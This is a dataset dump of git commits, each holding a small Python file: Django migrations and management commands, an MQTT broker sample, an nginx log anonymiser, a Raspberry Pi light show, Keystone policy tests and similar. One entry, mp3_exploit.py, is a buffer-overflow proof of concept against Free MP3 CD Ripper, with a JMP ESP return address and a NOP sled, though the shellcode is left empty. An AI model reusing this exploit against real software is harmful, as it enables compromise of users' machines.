commit stringlengths 40 40 | subject stringlengths 1 1.49k | old_file stringlengths 4 311 | new_file stringlengths 4 311 | new_contents stringlengths 1 29.8k | old_contents stringlengths 0 9.9k | lang stringclasses 3 values | proba float64 0 1 |
|---|---|---|---|---|---|---|---|
852ade075e69492ee4a4cd7096709b2724782180 | add a management command to export details of users who submitted stories as csv | apps/stories/management/commands/export_stories_csv.py | apps/stories/management/commands/export_stories_csv.py | from django.core.management.base import BaseCommand
from stories.models import Story
from optparse import make_option
import codecs
import csv
class Command(BaseCommand):
args = ""
help = """Dump out all comments text for Web SYS Stories
python manage.py export_stories_comments --file=<path/to/file.csv> --admin2=587 --from=2015-01-01 --to=2015-08-15
Use only one of 'admin1', 'admin2', 'admin3' or 'school'
Specify from and to dates as YYYY-MM-DD
"""
option_list = BaseCommand.option_list + (
make_option('--file',
help='Path to output file'),
make_option('--admin1',
help='Admin 1 id to filter by'),
make_option('--admin2',
help='Admin 2 id to filter by'),
make_option('--admin3',
help='Admin 3 id to filter by'),
make_option('--school',
help='School id to filter by'),
make_option('--from',
help='From date to filter by'),
make_option('--to',
help='To date to filter by'),
make_option('--source',
help='Source to filter by, eg. web, ivrs, etc.'),
)
def handle(self, *args, **options):
'''
TODO: make querying more efficient using select_related or so
'''
filename = options.get('file', None)
if not filename:
print "Please specify a filename with the --file argument"
return
out = codecs.open(filename, mode="w", encoding="utf-8")
key, val = self.get_query(options)
stories_qset = Story.objects.all()
print key, val
if key:
stories_qset = stories_qset.filter(**{key: val})
if options.get('from', None):
from_date = self.get_date(options.get('from'))
stories_qset = stories_qset.filter(date__gte=from_date)
if options.get('to', None):
to_date = self.get_date(options.get('to'))
stories_qset = stories_qset.filter(date__lte=to_date)
if options.get('source', None):
source_name = options.get('source')
stories_qset = stories_qset.filter(group__source__name=source_name)
if not stories_qset.exists():
print "No stories found matching query"
return
fields = [
"story_id",
"date",
"name",
"email",
"phone",
"school",
"admin1",
"admin2",
"admin3"
]
writer = csv.writer(out)
writer.writerow(fields)
print "writing file"
for story in stories_qset:
row = self.get_row(story)
writer.writerow(row)
out.close()
print "done"
def get_row(self, story):
return [
story.id,
story.date_of_visit.strftime("%Y-%m-%d"),
story.name,
story.email,
story.telephone,
story.school.name,
story.school.schooldetails.admin1.name,
story.school.schooldetails.admin2.name,
story.school.schooldetails.admin3.name,
]
def get_query(self, options):
query_string_fragment = "school__schooldetails__"
key = None
if options.get('admin1', None):
key = 'admin1'
val = options.get('admin1')
if options.get('admin2', None):
key = 'admin2'
val = options.get('admin2')
if options.get('admmin3', None):
key = 'admin3'
val = options.get('admin3')
if key:
return (query_string_fragment + key, val,)
if options.get('school', None):
key = 'school'
val = options.get('school')
return (key, val,)
return (None, None,)
def get_date(self, date_string):
return datetime.datetime.strptime(date_string, "%Y-%m-%d")
| Python | 0 | |
1ac09013e8cf89e83418de0be9d83b87a0a20634 | Create mp3_exploit.py | mp3_exploit.py | mp3_exploit.py | #!/usr/bin/env python
'''
Author: Chris Duffy
Date: May 2015
Purpose: To provide a means to demonstrate a simple file upload proof of concept related to
exploiting Free MP3 CD Ripper.
'''
import struct

filename = "exploit.wav"

# 4112 filler bytes pad the buffer up to the saved return address.
fill = b"A" * 4112

# eip = struct.pack('<I', 0x42424242)  # EIP overwrite verification
eip = struct.pack('<I', 0x7C874413)  # JMP ESP instruction from Kernel32.dll

# Small NOP sled so the jump does not have to be byte-exact.
nop = b"\x90" * 16

# Place for calc.exe shellcode (fill in as a bytes literal).
# was: calc = () — a tuple, which made the concatenations below raise
# TypeError; placeholders must be (empty) byte strings.
calc = b""
# Place for actual shellcode
shell = b""

# exploit = fill + eip + nop + calc   # loader for simple proof of concept shellcode
exploit = fill + eip + nop + shell  # loader for real shell access

# was: mode "w" — a raw binary payload (e.g. the \x90 NOPs) must be written
# in binary mode or newline translation can corrupt it on Windows; also use
# a context manager so the handle is always closed.
with open(filename, "wb") as writeFile:
    writeFile.write(exploit)
| Python | 0 | |
68ea60fd87e3e0240f82a42f0f6b4dcd65732f97 | Add MQTT server example | mqtt-server.py | mqtt-server.py | #!/usr/bin/python3
#
# Copyright (c) 2015-2016, Fabian Affolter <fabian@affolter-engineering.ch>
# Released under the MIT license. See LICENSE file for details.
#
# Source: https://github.com/beerfactory/hbmqtt/blob/develop/samples/broker_start.py
#
import logging
import asyncio
import os
from hbmqtt.broker import Broker
logger = logging.getLogger(__name__)

# Broker listeners: plain MQTT on all interfaces, MQTT-over-websockets on
# localhost only (max 10 concurrent websocket connections).
config = {
    'listeners': {
        'default': {
            'type': 'tcp',
            'bind': '0.0.0.0:1883',
        },
        'ws-mqtt': {
            'bind': '127.0.0.1:3000',
            'type': 'ws',
            'max_connections': 10,
        },
    },
}

broker = Broker(config)


# was: @asyncio.coroutine with `yield from` — that decorator was removed in
# Python 3.11; native async/await is the supported equivalent.
async def test_coro():
    """Start the embedded MQTT broker."""
    await broker.start()


if __name__ == '__main__':
    formatter = "[%(asctime)s] :: %(levelname)s :: %(name)s :: %(message)s"
    logging.basicConfig(level=logging.INFO, format=formatter)
    # Start the broker, then keep the loop alive to serve clients forever.
    loop = asyncio.get_event_loop()
    loop.run_until_complete(test_coro())
    loop.run_forever()
| Python | 0.000001 | |
c0b05a43e10693f8aab87a7f86726d512b7494fc | Add tenant exporter for accounting | bluebottle/clients/management/commands/export_tenants.py | bluebottle/clients/management/commands/export_tenants.py | import json
from rest_framework.authtoken.models import Token
from django.contrib.contenttypes.models import ContentType
from django.core.management.base import BaseCommand
from bluebottle.clients import properties
from bluebottle.clients.models import Client
from bluebottle.clients.utils import LocalTenant
class Command(BaseCommand):
help = 'Export tenants, so that we can import them into the accounting app'
def add_arguments(self, parser):
parser.add_argument('--file', type=str, default=None, action='store')
def handle(self, *args, **options):
results = []
for client in Client.objects.all():
properties.set_tenant(client)
with LocalTenant(client, clear_tenant=True):
ContentType.objects.clear_cache()
accounts = []
for merchant in properties.MERCHANT_ACCOUNTS:
if merchant['merchant'] == 'docdata':
accounts.append(
{
'service_type': 'docdata',
'username': merchant['merchant_name']
}
)
api_key = Token.objects.get(user__username='accounting').key
results.append({
"name": client.schema_name,
"domain": properties.TENANT_MAIL_PROPERTIES['website'],
"api_key": api_key,
"accounts": accounts
})
if options['file']:
text_file = open(options['file'], "w")
text_file.write(json.dumps(results))
text_file.close()
else:
print json.dumps(results)
| Python | 0 | |
dfbf888ca0b56448a4f211900b16e3c85648b241 | Add migration for changing docstring of Note.is_private to unicode | editorsnotes/main/migrations/0025_auto_20160628_0913.py | editorsnotes/main/migrations/0025_auto_20160628_0913.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-06-28 09:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: re-declare Note.is_private so its recorded help_text
    matches the (unicode) docstring on the model."""

    dependencies = [
        ('main', '0024_topic_ld'),
    ]

    operations = [
        # NOTE(review): the "be be" typo is part of the recorded model state;
        # it must stay in sync with the model field, so it is left untouched.
        migrations.AlterField(
            model_name='note',
            name='is_private',
            field=models.BooleanField(default=False, help_text="If true, will only be be viewable to users who belong to the note's project."),
        ),
    ]
| Python | 0 | |
a45a0bb366ae28d38d543ce71f32f625e9b80042 | add tools module | modules/tools.py | modules/tools.py | from pandas import DataFrame
from pandas.tseries.tools import to_datetime
#|Create time series from trade history DataFrame
def time_series(df, period):
    """Aggregate a trade-history DataFrame into OHLC bars.

    One row is produced per *period*-second bucket between the minimum and
    maximum 'timestamp' in *df*, via time_slice(); the result is indexed by
    datetime through date_index().
    """
    ts = DataFrame(columns=('timestamp', 'price', 'high',
                            'low', 'open', 'amount'))
    tmin = int(df['timestamp'].min())
    tmax = int(df['timestamp'].max())
    for tsmp in range(tmin, tmax, period):
        slic = time_slice(df, tsmp, period)
        # NOTE(review): DataFrame.append was removed in pandas 2.0 — this
        # only works on old pandas; modern code would collect and concat.
        ts = ts.append(slic)
    ts = date_index(ts)
    return ts
def time_slice(df, tsmp, period):
    """Build one OHLC row for the trades in [tsmp, tsmp + period).

    If the bucket is empty, the last price seen before *tsmp* is carried
    forward for price/high/low/open with zero volume.
    """
    # Last traded price strictly before the bucket start (a 1-row Series;
    # may be empty at the very beginning of the history).
    lprice = df[df['timestamp'] < tsmp].tail(1)['price']
    df = df[df['timestamp'] >= tsmp]
    df = df[df['timestamp'] < (tsmp + period)]
    if len(df.index) == 0:
        # NOTE(review): lprice keeps its original index here, while
        # 'timestamp' uses index 0 — confirm the intended row alignment.
        slic = DataFrame({'timestamp' : [tsmp], 'price': lprice,
                          'high': lprice, 'low': lprice,
                          'open': lprice, 'amount': 0.0})
    else:
        slic = DataFrame({'timestamp' : [tsmp],
                          'price': round(df['price'].iloc[-1], 3),
                          'high': round(df['price'].max(), 3),
                          'low': round(df['price'].min(), 3),
                          'open': round(df['price'].iloc[0], 3),
                          'amount': round(df['amount'].sum(), 4)})
    return slic
#|Create datetime index for DataFrame using "timestamp" column
def date_index(df):
    """Index *df* by a 'date' column built from its epoch 'timestamp' column."""
    converted = to_datetime(df['timestamp'], unit='s')
    df['date'] = converted
    return df.set_index('date')
#Outputs number of seconds in provided number of days/hours/minutes
def seconds(days=0, hours=0, minutes=0, typ=''):
    """Return a number of seconds.

    With the default ``typ=''`` this is the total number of seconds in the
    given days/hours/minutes.  With ``typ`` 'd'/'h'/'m' it returns the
    length of one day/hour/minute in seconds (the count arguments are
    ignored, matching the original behaviour).
    """
    if typ == '':
        return 86400 * days + 3600 * hours + 60 * minutes
    if typ == 'd':
        return 86400
    if typ == 'h':
        return 3600
    if typ == 'm':
        return 60  # was 50 — a minute has 60 seconds
    # was: fell through to `return total` with `total` unbound (NameError);
    # make the failure explicit instead.
    raise ValueError("unknown typ: %r" % (typ,))
| Python | 0.000001 | |
2f4d413e14011847138d6afd27a210fc58823c8a | add certificate and key migrations | rootfs/api/migrations/0004_auto_20160124_2134.py | rootfs/api/migrations/0004_auto_20160124_2134.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-01-24 21:34
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: make Certificate.expires and Key.fingerprint
    non-editable (set by the application, not via forms/admin)."""

    dependencies = [
        ('api', '0003_auto_20160114_0310'),
    ]

    operations = [
        migrations.AlterField(
            model_name='certificate',
            name='expires',
            field=models.DateTimeField(editable=False),
        ),
        migrations.AlterField(
            model_name='key',
            name='fingerprint',
            field=models.CharField(editable=False, max_length=128),
        ),
    ]
| Python | 0.000001 | |
d1aa553f739e91cd470eea23042b6c8bcebe9b6f | add mocked integrationtest for the deprecationwarning of makeitem | testing/python/test_deprecations.py | testing/python/test_deprecations.py | import pytest
from _pytest.python import PyCollector
class PyCollectorMock(PyCollector):
    """evil hack"""

    def __init__(self):
        # Deliberately skip PyCollector.__init__ (which needs a real
        # session/parent); only track whether _makeitem was invoked.
        self.called = False

    def _makeitem(self, *k):
        """hack to disable the actual behaviour"""
        self.called = True
def test_pycollector_makeitem_is_deprecated():
    # The public makeitem() must emit a DeprecationWarning and still
    # delegate to the (stubbed) _makeitem implementation.
    collector = PyCollectorMock()
    with pytest.deprecated_call():
        collector.makeitem('foo', 'bar')
    assert collector.called
| Python | 0 | |
e348ec573a4882258466cdc2ab73da8b4dbbe256 | Create pillu.py | modules/pillu.py | modules/pillu.py | #test
| Python | 0.000003 | |
8e726895d1e4e27b0b9548103cd1b202de79c21e | Anonymize nginx logs | ngxtop/anonym.py | ngxtop/anonym.py | import sqlite3
import csv
import datetime
def main(args):
    """Read the sqlite dump of nginx logs and emit two anonymised CSVs.

    NOTE(review): *args* is currently unused — database and output file
    names are hard-coded.
    """
    # input
    fn_database = 'ngxtop.db'
    # outputs
    fn_workset = 'workset.csv'
    fn_scenario = 'scenario.csv'
    conn = sqlite3.connect(fn_database)
    cursor = conn.cursor()
    # Build map filename to anonym filename
    map_filename = build_map_filename(cursor)
    map_addr = build_map_addr(cursor)
    # Workset rows sorted by their anonymous id.
    output_workset(fn_workset, sorted(map_filename.values(), key=lambda x: x[0]))
    output_scenario(fn_scenario, cursor, map_filename, map_addr)
    conn.close()
    pass
def build_map_addr(cursor):
    """Map each distinct client address in the log to a small anonymous id."""
    cursor.execute("select distinct remote_addr from log")
    return {row[0]: anon_id for anon_id, row in enumerate(cursor)}
def build_map_filename(cursor):
    """Map request paths with a max response > 4096 bytes to (anonymous id, size).

    Ids are assigned in ascending order of the largest response size ever
    served for the path.
    """
    cursor.execute("select filename, size from (select request_path as filename, max(bytes_sent) as size from log where bytes_sent > 4096 group by request_path) order by size")
    mapping = {}
    for anon_id, (fname, size) in enumerate(cursor):
        mapping[fname] = (anon_id, size)
    return mapping
def output_workset(fn_workset, workset):
    """Write the anonymised (id, size) workset rows to a CSV file."""
    # was: open() without close — handle leaked; also pass newline='' as the
    # csv module requires to avoid doubled line endings on Windows.
    with open(fn_workset, 'w', newline='') as cvs_file:
        writer = csv.writer(cvs_file, delimiter=',')
        writer.writerow(['data', 'bytes'])
        writer.writerows(workset)
# First timestamp seen; all later times are reported relative to it.
start_time = None


def convert_time(strtime):
    """Convert an nginx time_local string to whole seconds since the first call.

    The first call establishes the epoch and returns 0.
    """
    global start_time
    stamp = datetime.datetime.strptime(strtime.split(" ")[0], '%d/%b/%Y:%H:%M:%S')
    if start_time is None:
        start_time = stamp
        return 0
    return int((stamp - start_time).total_seconds())
def output_scenario(fn_scenario,cursor,map_filename,map_addr):
csvheader = ['time','data','bytes','addr']
header = ['time_local', 'request_path', 'bytes_sent', 'remote_addr']
cursor.execute("select %s from log where bytes_sent > 4096 order by time_local" % (" ,".join(header)))
db_header = [d[0] for d in cursor.description]
for h in header:
if not h in db_header:
raise Exception('Missing header')
with open(fn_scenario,'w') as cvs_file:
writer = csv.writer(cvs_file, delimiter=',')
writer.writerow(csvheader)
for row in cursor:
(strtime,filename,bytes,remote_addr) = row
time = convert_time(strtime)
data = map_filename[str(filename)][0]
addr = map_addr[remote_addr]
writer.writerow([time,data,bytes,addr])
pass
if __name__ == '__main__':
    # CLI entry point; argv is passed through but currently ignored by main().
    import sys
    main(sys.argv)
| Python | 0.999552 | |
1eb2e1390d41c65943e777a66918df87b4ee8799 | Add constructive_hierarchy | constructive_hierarchy.py | constructive_hierarchy.py | '''Reason about a directed graph in which the (non-)existance of some edges
must be inferred by the disconnectedness of certain vertices. Collect (truthy)
evidence for boolean function return values.'''
def transitive_closure_set(vertices, edges):
    """Find the transitive closure of a set of vertices.

    Returns every vertex reachable from *vertices* by following directed
    *edges* (a collection of (a, b) pairs), including the start set itself.
    """
    # was: a dict comprehension {b: (a, b) ...} whose keys were the
    # successors — and `vertices | neighbours` then tried to union a set
    # with a dict, raising TypeError on any non-trivial input.  A plain set
    # of successor vertices is what the recursion needs.
    successors = {b for a, b in edges if a in vertices}
    if successors.issubset(vertices):
        return vertices
    return transitive_closure_set(vertices | successors, edges)
#def downward_closure(vertex, edges):
# '''Find the downward closure of a vertex.'''
# return transitive_closure_set({vertex}, edges)
#
#def upward_closure(vertex, edges):
# '''Find the upward closure of a vertex.'''
# return transitive_closure_set({vertex}, {(b, a) for a, b in edges})
#
#def is_connected(a, b, edges):
# '''Check if there is a path from a to b.'''
# return b in downward_closure(a, edges)
#
#def is_separated(a, b, edges, disconnections):
# '''Check that a and b will remain not connected even if edges are added to
# the graph, as long as the vertex pairs listed in disconnections remain
# disconected.'''
# return any((p, q) in disconnections
# for p in upward_closure(a, edges)
# for q in downward_closure(b, edges))
#
#def find_possible_connections(vertices, edges, disconnections):
# '''Find which edges can be added to create new connections, without
# connecting any pairs in disconnections.'''
# return {(a, b) for a in vertices for b in vertices if
# not is_connected(a, b, edges) and
# not is_separated(a, b, edges, disconnections)}
#
#def is_isthmus(edge, edges):
# return not is_connected(*edge, edges - {edge})
#
#def spanning_tree(edges):
# for edge in edges:
# if not is_isthmus(edge, edges):
# return spanning_tree(edges - {edge})
# return edges
#
#def rank_possible_edge(edge, vertices, edges, disconnections):
# evaluator = lambda x, y: len(find_possible_connections(vertices, x, y))
# exists_rank = evaluator(edges | {edge}, disconnections)
# not_exists_rank = evaluator(edges, disconnections | {edge})
# return abs(exists_rank) + abs(not_exists_rank)
| Python | 0.999379 | |
25ff8c6f8bc9d70886d004f8b64f08facb8c12cf | Create Find the Celebrity sol for Leetcode | leetcode/277-Find-the-Celebrity/FindtheCelebrity_sol.py | leetcode/277-Find-the-Celebrity/FindtheCelebrity_sol.py | # The knows API is already defined for you.
# @param a, person a
# @param b, person b
# @return a boolean, whether a knows b
# def knows(a, b):
class Solution(object):
    def findCelebrity(self, n):
        """
        Return the index of the celebrity among *n* people, or -1 if none.

        Classic two-pass O(n) algorithm: an elimination pass leaves a single
        candidate (anyone who knows someone else cannot be the celebrity),
        then a verification pass confirms that everyone knows the candidate
        and the candidate knows no one.

        :type n: int
        :rtype: int
        """
        if n < 2:
            return -1
        # Pass 1: eliminate non-celebrities down to one candidate.
        candidate = 0
        for person in range(1, n):
            if not knows(person, candidate):
                candidate = person
        # Pass 2: verify the surviving candidate against everyone else.
        for person in range(n):
            if person == candidate:
                continue
            if not knows(person, candidate) or knows(candidate, person):
                return -1
        return candidate
| Python | 0 | |
3eeaa890f0a7afcf7a6f470055c5bc0fda20ae5c | create moistureCaptor.py | captors-enabled/moistureCaptor.py | captors-enabled/moistureCaptor.py |
class Captor():
    """Soil-moisture captor stub identified by a fixed sensor id."""

    # Fixed identifier for this captor type.
    id = 5

    def __init__(self):
        # was: `def Captor()` — a Java-style "constructor" that Python never
        # calls and that could not even be invoked (no self parameter yet it
        # assigned to self.id).  Replaced with a real initializer.
        self.id = 5

    def callback(self):
        """Read the moisture value; currently a stub that returns 0."""
        moisture = 0
        # start communication with server
        return moisture

    def getiId(self):
        # NOTE(review): method name keeps the original 'getiId' typo for
        # backward compatibility with existing callers.
        return self.id
| Python | 0.000034 | |
25aa486fcba631a251db4f0366d4d4f713a86f37 | Add missing migration file | SigmaPi/UserInfo/migrations/0003_auto_20170204_1342.py | SigmaPi/UserInfo/migrations/0003_auto_20170204_1342.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: update PledgeClass model options
    (default ordering by dateInitiated and human-readable verbose names)."""

    dependencies = [
        ('UserInfo', '0002_auto_20161208_1712'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='pledgeclass',
            options={'ordering': ['dateInitiated'], 'verbose_name': 'Pledge Class', 'verbose_name_plural': 'Pledge Classes'},
        ),
    ]
| Python | 0.000002 | |
5e51cda3a7441f6e31477988b1288d1497fe23d9 | Add arguments snippet | code/python/snippets/arguments.py | code/python/snippets/arguments.py | """
Add command line arguments to your script.
This snippet adds the default command line arguments required for any interaction with the UpGuard API.
To Use:
1. Copy snippet to the top of your script
2. Populate description (this is shown when running `--help`)
3. Access arguments with `args` object, for example: `args.target_url`
"""
import argparse

# Standard UpGuard API arguments: instance URL plus api/secret key pair.
# NOTE(review): the description below is an example left over from another
# script — replace it per step 2 of the module docstring.
parser = argparse.ArgumentParser(description='Retrieve a list of open User Tasks and their associated nodes')
parser.add_argument('--target-url', required=True, help='URL for the UpGuard instance')
parser.add_argument('--api-key', required=True, help='API key for the UpGuard instance')
parser.add_argument('--secret-key', required=True, help='Secret key for the UpGuard instance')
parser.add_argument('--insecure', action='store_true', help='Ignore SSL certificate checks')
args = parser.parse_args()
| Python | 0.000007 | |
8bdc9c0685500b822787779b5ebffa46b00d8138 | Add script | lightshow.py | lightshow.py | #!/usr/bin/sudo / usr/bin/python
import RPi.GPIO as GPIO
from time import sleep
GPIO.setmode(GPIO.BOARD)  # physical (board) pin numbering
GPIO.setwarnings(False)

# LED name -> list of three PWM channels (one per colour component).
leds = {'floor': [], 'top-left': []}

def setupled(name, pins):
    # Register the three colour pins of an RGB LED as 100 Hz PWM outputs
    # and remember the channel objects under *name*.
    for i in range(0, 3):
        GPIO.setup(pins[i], GPIO.OUT)
        leds[name].append(GPIO.PWM(pins[i], 100))

setupled('floor', [11, 13, 15])
setupled('top-left', [12, 16, 18])
# Start every PWM channel at 0% duty cycle.  NOTE(review): setcolor()
# inverts the duty cycle (255 - value), which suggests common-anode wiring
# where 0% duty means fully lit — confirm against the hardware.
for key, value in leds.items():
    for i in value:
        i.start(0)

# RGB colour triples, 0-255 per channel.
WHITE = [255, 255, 255]
BLACK = [0, 0, 0]
RED = [255, 0, 0]
GREEN = [0, 255, 0]
BLUE = [0, 0, 255]
YELLOW = [255, 255, 0]
PURPLE = [255, 0, 255]
CYAN = [0, 255, 255]
def setcolor(led, color):
    # Apply an RGB triple (0-255) to the named LED.  The duty cycle is
    # inverted (255 - channel) and scaled to 0-100%.
    # NOTE(review): xrange is Python 2 only.
    for i in xrange(0, 3):
        leds[led][i].ChangeDutyCycle((255 - color[i]) * 100 / 255)
    print('Setting {} to {}'.format(led, color))
# Start program here
# Cycle through solid colours, then fade the two LEDs in opposite
# directions.  NOTE(review): this loop never exits, so the cleanup code
# below it is unreachable.
while True:
    setcolor('floor', RED)
    sleep(1)
    setcolor('top-left', GREEN)
    sleep(1)
    setcolor('floor', BLUE)
    sleep(1)
    setcolor('top-left', YELLOW)
    sleep(1)
    setcolor('floor', PURPLE)
    sleep(1)
    setcolor('top-left', CYAN)
    sleep(1)
    setcolor('floor', WHITE)
    sleep(1)
    setcolor('top-left', BLACK)
    sleep(1)
    # Fade 'floor' from black to white ...
    for i in xrange(0, 256):
        setcolor('floor', [i, i, i])
        sleep(0.01)
    # ... while 'top-left' fades from white to black.
    for x in xrange(0, 256):
        y = 255 - x
        setcolor('top-left', [y, y, y])
        sleep(0.01)
# Shut down all PWM channels and release the GPIO pins.
# was: iterated over the undefined name 'rooms' (NameError) — the channel
# registry in this script is called 'leds'.
for key, value in leds.items():
    for i in value:
        i.stop()
GPIO.cleanup()
| Python | 0.000002 | |
1a4052deb8e0ab2deb7038220ae23d7bb9311ce9 | Add initial version of the script | ovf_to_facter.py | ovf_to_facter.py | #!/usr/bin/python
#stdlib
import json
import os
import subprocess
from xml.dom.minidom import parseString
def which(cmd):
    """Python implementation of `which` command.

    Return the full path of *cmd* found on PATH (also trying the PATHEXT
    extensions on Windows), or None when no executable match exists.
    """
    for directory in os.environ["PATH"].split(os.pathsep):
        candidate = os.path.join(directory, cmd)
        if os.path.exists(candidate) and os.access(candidate, os.X_OK):
            return candidate
        if os.name == "nt":
            for ext in os.environ["PATHEXT"].split(os.pathsep):
                extended = candidate + ext
                if os.path.exists(extended) and os.access(extended, os.X_OK):
                    return extended
    return None
# Locate the external tools once, at import time (None when absent).
FACTER = which("facter")
VMTOOLS = which("vmtoolsd")

def facter(*args):
    """Run facter for the given fact names and return the parsed JSON dict."""
    command = [FACTER, '--json', '--no-external'] + list(args)
    return json.loads(subprocess.check_output(command))
def findXmlSection(dom, sectionName):
    """Return the first element named *sectionName* anywhere in *dom*."""
    return dom.getElementsByTagName(sectionName)[0]
def getOVFProperties(ovfEnv):
    """Parse an OVF environment document and return its Property map.

    Extracts the oe:key / oe:value attribute pairs from every Property
    element inside the PropertySection.
    """
    dom = parseString(ovfEnv)
    section = findXmlSection(dom, "PropertySection")
    propertyMap = {
        prop.getAttribute("oe:key"): prop.getAttribute("oe:value")
        for prop in section.getElementsByTagName("Property")
    }
    dom.unlink()
    return propertyMap
def getVMWareOvfEnv():
    # Print facter-style key=value lines derived from the VMware OVF
    # environment ("ovf=true" plus one "ovf_<key>=<value>" per property),
    # or "ovf=false" when the environment cannot be read.
    if VMTOOLS == None:
        raise Exception("VMWare Tools not installed.")
    try:
        ovf = subprocess.check_output([VMTOOLS, '--cmd', 'info-get guestinfo.ovfenv'], stderr=subprocess.STDOUT)
        properties = getOVFProperties(ovf)
        print "ovf=true"
        for key, value in properties.iteritems():
            print "ovf_" + key + "=" + value
    # NOTE(review): bare except deliberately treats any failure (missing
    # guestinfo, XML errors) as "no OVF environment".
    except:
        print "ovf=false"
    return
if __name__ == "__main__":
    # Only attempt the OVF lookup when facter says we are a VMware guest.
    facts = facter("is_virtual", "virtual")
    if (facts['is_virtual'] == 'true') and (facts['virtual'] == 'vmware'):
        getVMWareOvfEnv()
| Python | 0.000001 | |
2f0ba9368bc44cffce1dcf2ec483aabf04c2e127 | add python #5 | python/5.py | python/5.py | #!/usr/bin/env python
'''
Problem
=======
2520 is the smallest number that can be divided by each of the numbers from 1 to 10
without any remainder. What is the smallest positive number that is evenly divisible
by all of the numbers from 1 to 20?
Latest Run Stats
====== === =====
'''
from math import ceil
from math import sqrt
def primeSieve(num):
    """Return the set of primes strictly below *num* (sieve of Eratosthenes)."""
    limit = int(ceil(sqrt(num)))
    composites = set()
    for base in range(2, limit):
        composites.update(range(base * 2, num, base))
    return {candidate for candidate in range(2, num) if candidate not in composites}
def anyDivisible(nums, divisor):
    """Return True if any element of *nums* is divisible by *divisor*."""
    return any(value % divisor == 0 for value in nums)
limit = 20  # upper limit for divisors
divisors = range(2, limit + 1)
primes = primeSieve(max(divisors))
primeFactors = []

# Use a LCM table to determine the prime factors that make up the solution:
# for each prime, repeatedly divide every divisor it divides; each pass
# contributes one copy of the prime, so prime powers are captured too.
# (Iteration order over the set of primes does not affect the result.)
for prime in primes:
    if divisors == []:
        break
    while True:
        divisible = anyDivisible(divisors, prime)
        if not divisible:
            break
        divisors = [i if i% prime != 0 else i/prime for i in divisors]
        divisors = [i for i in divisors if i > 1]
        primeFactors.append(prime)

# Product of all collected prime factors = LCM(1..limit).
# NOTE(review): Python 2 only — `print` statement and builtin `reduce`.
answer = reduce(lambda primeFactor, total: primeFactor*total, primeFactors)
print answer #should be only print statement
| Python | 0.000032 | |
fdf8cb1f0420eef27592d32f2e10066482304314 | Add region protection tests for system readers | keystone/tests/unit/protection/v3/test_regions.py | keystone/tests/unit/protection/v3/test_regions.py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from six.moves import http_client
from keystone.common import provider_api
import keystone.conf
from keystone.tests.common import auth as common_auth
from keystone.tests import unit
from keystone.tests.unit import base_classes
from keystone.tests.unit import ksfixtures
CONF = keystone.conf.CONF
PROVIDERS = provider_api.ProviderAPIs
class _UserRegionTests(object):
    """Common default functionality for all users."""

    def test_user_can_get_a_region(self):
        # Any persona mixing this class in may read a single region.
        region = PROVIDERS.catalog_api.create_region(unit.new_region_ref())

        with self.test_client() as c:
            c.get('/v3/regions/%s' % region['id'], headers=self.headers)

    def test_user_can_list_regions(self):
        # Any persona mixing this class in may list regions; every created
        # region must appear in the listing.
        expected_regions = []
        for _ in range(2):
            region = PROVIDERS.catalog_api.create_region(unit.new_region_ref())
            expected_regions.append(region['id'])

        with self.test_client() as c:
            r = c.get('/v3/regions', headers=self.headers)
            for region in r.json['regions']:
                self.assertIn(region['id'], expected_regions)
class SystemReaderTests(base_classes.TestCaseWithBootstrap,
                        common_auth.AuthTestMixin,
                        _UserRegionTests):
    """System readers can view regions but never create/update/delete them."""

    def setUp(self):
        super(SystemReaderTests, self).setUp()
        self.loadapp()
        self.useFixture(ksfixtures.Policy(self.config_fixture))
        self.config_fixture.config(group='oslo_policy', enforce_scope=True)

        # Create a user and give it the reader role on the system.
        system_reader = unit.new_user_ref(
            domain_id=CONF.identity.default_domain_id
        )
        self.user_id = PROVIDERS.identity_api.create_user(
            system_reader
        )['id']
        PROVIDERS.assignment_api.create_system_grant_for_user(
            self.user_id, self.bootstrapper.reader_role_id
        )

        auth = self.build_authentication_request(
            user_id=self.user_id, password=system_reader['password'],
            system=True
        )

        # Grab a token using the persona we're testing and prepare headers
        # for requests we'll be making in the tests.
        with self.test_client() as c:
            r = c.post('/v3/auth/tokens', json=auth)
            self.token_id = r.headers['X-Subject-Token']
            self.headers = {'X-Auth-Token': self.token_id}

    def test_user_cannot_create_regions(self):
        create = {'region': {'description': uuid.uuid4().hex}}

        with self.test_client() as c:
            c.post(
                '/v3/regions', json=create, headers=self.headers,
                expected_status_code=http_client.FORBIDDEN
            )

    def test_user_cannot_update_regions(self):
        region = PROVIDERS.catalog_api.create_region(unit.new_region_ref())

        with self.test_client() as c:
            update = {'region': {'description': uuid.uuid4().hex}}
            c.patch(
                '/v3/regions/%s' % region['id'], json=update,
                headers=self.headers,
                expected_status_code=http_client.FORBIDDEN
            )

    def test_user_cannot_delete_regions(self):
        region = PROVIDERS.catalog_api.create_region(unit.new_region_ref())

        with self.test_client() as c:
            c.delete(
                '/v3/regions/%s' % region['id'],
                headers=self.headers,
                expected_status_code=http_client.FORBIDDEN
            )
| Python | 0.000001 | |
e4139c81bf914840d7223557f1f6da926a28413b | Add bootstrap script to run playbook locally | local_run.py | local_run.py | #!/usr/bin/env python2
"""Deploy CollectD on localhost for monitoring with mist.io"""
import os
import sys
import argparse
import subprocess
TMP_DIR = "/tmp/mistio"
VENV_VERSION = "1.11.6"
ANSIBLE_VERSION = "1.7.2"
PYPI_URL = "https://pypi.python.org/packages/source/"
PLAYBOOK_PATH = "ansible/main.yml"
def shellcmd(cmd, exit_on_error=True, verbose=True):
    """Run a command using the shell"""
    # Returns the command's exit status; by default the whole script aborts
    # when the command fails (non-zero return code).
    if verbose:
        print "Running:", cmd
    return_code = subprocess.call(cmd, shell=True)
    if exit_on_error and return_code:
        sys.exit("ERROR: Command '%s' exited with return code %d."
                 % (cmd, return_code))
    return return_code
